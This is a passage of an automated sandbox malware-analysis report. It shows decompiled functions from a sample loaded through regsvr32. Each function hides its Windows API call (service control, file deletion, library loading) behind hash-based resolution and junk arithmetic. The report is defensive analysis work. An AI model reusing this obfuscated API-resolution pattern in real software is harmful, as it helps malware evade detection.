                                                                                                                • Instruction Fuzzy Hash: F2113671801248BBCB11DFA6DD0ACDFBFB8EB85704F108099F914A2250D3715B24DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0031EAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t35;
                                                                                                                				intOrPtr* _t40;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				E0030C98A(_t35);
                                                                                                                				_v28 = 0xe6c580;
                                                                                                                				_v24 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v8 = 0x2d161b;
                                                                                                                				_v8 = _v8 + 0xffffdf88;
                                                                                                                				_v8 = _v8 >> 0xa;
                                                                                                                				_v8 = _v8 | 0xc1e5ff2b;
                                                                                                                				_v8 = _v8 ^ 0xc1e88dee;
                                                                                                                				_v16 = 0xd78d92;
                                                                                                                				_v16 = _v16 ^ 0xcf4c3c1d;
                                                                                                                				_v16 = _v16 ^ 0xcf92c072;
                                                                                                                				_v12 = 0x4f9c9d;
                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                				_v12 = _v12 + 0xffff6ea2;
                                                                                                                				_v12 = _v12 ^ 0x00061ead;
                                                                                                                				_t40 = E00307F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
                                                                                                                				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
                                                                                                                				return _t41;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 0031EB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: 84070c328c0793c19900b93b3b667d47c65617a591a678b41fba72aa009af588
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 6B110476C02219BBCF11DFA4990A9EEBF74EB44314F108189E914A6294D3B14A64AFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00317DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t34;
                                                                                                                				int _t44;
                                                                                                                				signed int _t46;
                                                                                                                				signed int _t47;
                                                                                                                				struct _SHFILEOPSTRUCTW* _t54;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t54 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E0030C98A(_t34);
                                                                                                                				_v12 = 0xcdb49a;
                                                                                                                				_v12 = _v12 + 0x8f05;
                                                                                                                				_v12 = _v12 + 0xffff9965;
                                                                                                                				_v12 = _v12 ^ 0x00c100f7;
                                                                                                                				_v16 = 0xfe6a9a;
                                                                                                                				_v16 = _v16 + 0xffff1466;
                                                                                                                				_v16 = _v16 ^ 0x00fd95e9;
                                                                                                                				_v8 = 0xca762f;
                                                                                                                				_v8 = _v8 << 0xe;
                                                                                                                				_t46 = 0x7f;
                                                                                                                				_v8 = _v8 / _t46;
                                                                                                                				_t47 = 0x2e;
                                                                                                                				_v8 = _v8 / _t47;
                                                                                                                				_v8 = _v8 ^ 0x00082e4e;
                                                                                                                				E00307F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
                                                                                                                				_t44 = SHFileOperationW(_t54); // executed
                                                                                                                				return _t44;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00317E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: 929579d9812b60fc1061e82f8d3edfd637921ffe53792c9df39ce6e051e60194
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 31118BB1D01208FFDB14DFA9D80A8DEBBB5EB45314F20C19AE418A7281E7B55F149F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00303506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t39;
                                                                                                                				void* _t47;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E0030C98A(_t39);
                                                                                                                				_v16 = 0xf4e2fc;
                                                                                                                				_t49 = 0x3b;
                                                                                                                				_v16 = _v16 / _t49;
                                                                                                                				_v16 = _v16 ^ 0x00083f87;
                                                                                                                				_v12 = 0x549d10;
                                                                                                                				_v12 = _v12 << 0xd;
                                                                                                                				_v12 = _v12 + 0xffff8515;
                                                                                                                				_v12 = _v12 | 0x9f85c2ad;
                                                                                                                				_v12 = _v12 ^ 0x9fa0e66d;
                                                                                                                				_v8 = 0xbeaf63;
                                                                                                                				_v8 = _v8 | 0x7acbe5f7;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 ^ 0x3b62dfe8;
                                                                                                                				_v8 = _v8 ^ 0xcc9b72fd;
                                                                                                                				E00307F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
                                                                                                                				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
                                                                                                                				return _t47;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 003035AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: da5534967441e997a0cbf940096504bdcb55848949444d10d0d357d809677a57
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: 581125B1D01208BFCF05EFA4D84689EBFB5EB44740F208188F9146A261D3729B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E003102D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t59;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t75;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t75 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0030C98A(_t45);
                                                                                                                				_v12 = 0xd4268f;
                                                                                                                				_t61 = 0x55;
                                                                                                                				_v12 = _v12 / _t61;
                                                                                                                				_t62 = 0x39;
                                                                                                                				_v12 = _v12 / _t62;
                                                                                                                				_t63 = 0x19;
                                                                                                                				_v12 = _v12 / _t63;
                                                                                                                				_v12 = _v12 ^ 0x00038c24;
                                                                                                                				_v16 = 0xae7fc4;
                                                                                                                				_v16 = _v16 + 0x7c1;
                                                                                                                				_v16 = _v16 ^ 0x00ac1f44;
                                                                                                                				_v8 = 0x83f9bc;
                                                                                                                				_v8 = _v8 ^ 0x1ab9b921;
                                                                                                                				_v8 = _v8 | 0xa5451e1d;
                                                                                                                				_t64 = 0x5c;
                                                                                                                				_v8 = _v8 / _t64;
                                                                                                                				_v8 = _v8 ^ 0x021ff71d;
                                                                                                                				E00307F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
                                                                                                                				_t59 = CloseHandle(_t75); // executed
                                                                                                                				return _t59;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00310384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: 601dad1bc140e16259b562960b2a5e28ac56b4e9d73fe9ef256ea501f82dfab6
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: 94114F71E01208FFEB08DFA5D80A9EEBBB5EB84310F50C09AE504AB280E7B15F119F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1037
                                                                                                                Total number of Limit Nodes:15

                                                                                                                Control-flow Graph

                                                                                                                control_flow_graph 431 8d6e01-8d6eb3 call 8dc98a call 8d7f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E008D6E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				short* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t36;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				E008DC98A(_t36);
                                                                                                                				_v32 = 0x5e4691;
                                                                                                                				_v28 = 0xb22c2d;
                                                                                                                				_v24 = 0xd08f35;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0x466167;
                                                                                                                				_t48 = 0x37;
                                                                                                                				_v16 = _v16 / _t48;
                                                                                                                				_v16 = _v16 ^ 0x000b48c4;
                                                                                                                				_v8 = 0x78b9b;
                                                                                                                				_t49 = 0x12;
                                                                                                                				_v8 = _v8 / _t49;
                                                                                                                				_v8 = _v8 + 0x94cf;
                                                                                                                				_v8 = _v8 ^ 0x0006a86d;
                                                                                                                				_v12 = 0x7d284b;
                                                                                                                				_v12 = _v12 + 0xfffff9ba;
                                                                                                                				_v12 = _v12 ^ 0x007a5aaa;
                                                                                                                				E008D7F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
                                                                                                                				_t46 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                				return _t46;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 008D6EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 257b6464e1494cbdad8a575437aa667795310d75e9434ce8baa954899df7e8b1
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: E31188B2D01218BBDB04DFA9C8498DEBFB6EF41310F10C189F518A7241D7B55B118F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 545 8d8e38-8d8ee4 call 8dc98a call 8d7f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E008D8E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t37;
                                                                                                                				void* _t46;
                                                                                                                				signed int _t48;
                                                                                                                				int _t53;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E008DC98A(_t37);
                                                                                                                				_v12 = 0x1c994a;
                                                                                                                				_v12 = _v12 << 3;
                                                                                                                				_v12 = _v12 + 0xffff2161;
                                                                                                                				_v12 = _v12 | 0xd2ae04c7;
                                                                                                                				_v12 = _v12 ^ 0xd2e10dca;
                                                                                                                				_v8 = 0x3225a3;
                                                                                                                				_v8 = _v8 + 0xb485;
                                                                                                                				_t48 = 0x24;
                                                                                                                				_v8 = _v8 / _t48;
                                                                                                                				_v8 = _v8 + 0x1169;
                                                                                                                				_v8 = _v8 ^ 0x000adbd5;
                                                                                                                				_v16 = 0x918fbd;
                                                                                                                				_v16 = _v16 * 0x4a;
                                                                                                                				_v16 = _v16 ^ 0x2a1cf10f;
                                                                                                                				E008D7F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
                                                                                                                				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
                                                                                                                				return _t46;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008D8EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: b42c59893fb7e64247e7c54fe459650a93899ac9dd8c57468769829264544861
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 86112571D01208FBDF05DF94DA4A8DEBFB6EF05314F10C189E914A6250E7755B209F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 8d7bc6-8d7c79 call 8dc98a call 8d7f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E008D7BC6(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t42;
                                                                                                                				int _t52;
                                                                                                                				signed int _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E008DC98A(_t42);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0xa8f244;
                                                                                                                				_v16 = 0x845cf1;
                                                                                                                				_t54 = 0x49;
                                                                                                                				_v16 = _v16 / _t54;
                                                                                                                				_v16 = _v16 | 0x150b5070;
                                                                                                                				_v16 = _v16 ^ 0x15045549;
                                                                                                                				_v12 = 0xcbfb15;
                                                                                                                				_v12 = _v12 ^ 0x1a866322;
                                                                                                                				_v12 = _v12 + 0xffff3502;
                                                                                                                				_v12 = _v12 ^ 0x1a48e6f8;
                                                                                                                				_v8 = 0xe2385a;
                                                                                                                				_v8 = _v8 | 0xfdf9d9f4;
                                                                                                                				_t55 = 0x6e;
                                                                                                                				_v8 = _v8 / _t55;
                                                                                                                				_v8 = _v8 + 0xffffa480;
                                                                                                                				_v8 = _v8 ^ 0x02430dde;
                                                                                                                				E008D7F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
                                                                                                                				_t52 = DeleteFileW(_a4); // executed
                                                                                                                				return _t52;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 008D7C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: 3c0add7c3df98f222d3eec486903647006693c349c5f7912b16b2317baa099df
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: BB116DB1D0024CFFDB18DFE9D94AA9EBBB1EB40304F208199E414B7290D7B65B548F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 8eed7b-8eee13 call 8dc98a call 8d7f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E008EED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t33;
                                                                                                                				int _t43;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t53;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E008DC98A(_t33);
                                                                                                                				_v16 = 0xcf28aa;
                                                                                                                				_v16 = _v16 + 0xffff6a13;
                                                                                                                				_v16 = _v16 ^ 0x00c8c4e4;
                                                                                                                				_v12 = 0x49ff01;
                                                                                                                				_t45 = 0xb;
                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                				_t46 = 0x5d;
                                                                                                                				_v12 = _v12 / _t46;
                                                                                                                				_v12 = _v12 ^ 0x00001054;
                                                                                                                				_v8 = 0x2a1e4a;
                                                                                                                				_v8 = _v8 | 0x32e5c17e;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 ^ 0x00072801;
                                                                                                                				E008D7F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
                                                                                                                				_t43 = CloseServiceHandle(_t53); // executed
                                                                                                                				return _t43;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 008EEE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: c853e5ec59025cca4f6575c9688519cf38bd49b38e43e1ab1e08cb504a986e33
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 01015B71D00208BFDB18DFA5C94A8DEBFB5EF45324F10C18AE914A7241E7B25B558F51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E008D4A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t32;
                                                                                                                				struct HINSTANCE__* _t39;
                                                                                                                				WCHAR* _t43;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t43 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E008DC98A(_t32);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0x1178a2;
                                                                                                                				_v16 = 0x17846b;
                                                                                                                				_v16 = _v16 | 0x3185073b;
                                                                                                                				_v16 = _v16 + 0xffff538e;
                                                                                                                				_v16 = _v16 ^ 0x3197b69f;
                                                                                                                				_v12 = 0x16ba99;
                                                                                                                				_v12 = _v12 ^ 0x02625a09;
                                                                                                                				_v12 = _v12 ^ 0x25365766;
                                                                                                                				_v12 = _v12 ^ 0x27431ab3;
                                                                                                                				_v8 = 0xb183e3;
                                                                                                                				_v8 = _v8 * 0x28;
                                                                                                                				_v8 = _v8 | 0x77f20d23;
                                                                                                                				_v8 = _v8 ^ 0x7ff151f0;
                                                                                                                				E008D7F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
                                                                                                                				_t39 = LoadLibraryW(_t43); // executed
                                                                                                                				return _t39;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 2cb165dabe0bac3ec209a1a49a37d8ea3c5a45d23a820fad722e7dd23e4b0e81
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: 26113671C11208FBCB08DBA99A469DEBBB4FB00311F208189E415B6251D3704B148F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E008E7B25() {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_v16 = 0x340970;
                                                                                                                				_t2 =  &_v16; // 0x340970
                                                                                                                				_t31 = 0x26;
                                                                                                                				_v16 =  *_t2 / _t31;
                                                                                                                				_v16 = _v16 ^ 0x000e30ec;
                                                                                                                				_v8 = 0x85299d;
                                                                                                                				_v8 = _v8 + 0xa54a;
                                                                                                                				_v8 = _v8 ^ 0x35a74c3e;
                                                                                                                				_v8 = _v8 ^ 0x3521895a;
                                                                                                                				_v12 = 0xcc7db5;
                                                                                                                				_v12 = _v12 >> 9;
                                                                                                                				_v12 = _v12 ^ 0x000f948d;
                                                                                                                				E008D7F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
                                                                                                                				ExitProcess(0);
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 008E7B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.457525163.00000000008D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.457522876.00000000008D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000006.00000002.457535105.00000000008F4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_8d0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: ec755df6b352d8e0a3c93fb4cf847f17fa981eea7a1a0a92506135fa11bdc088
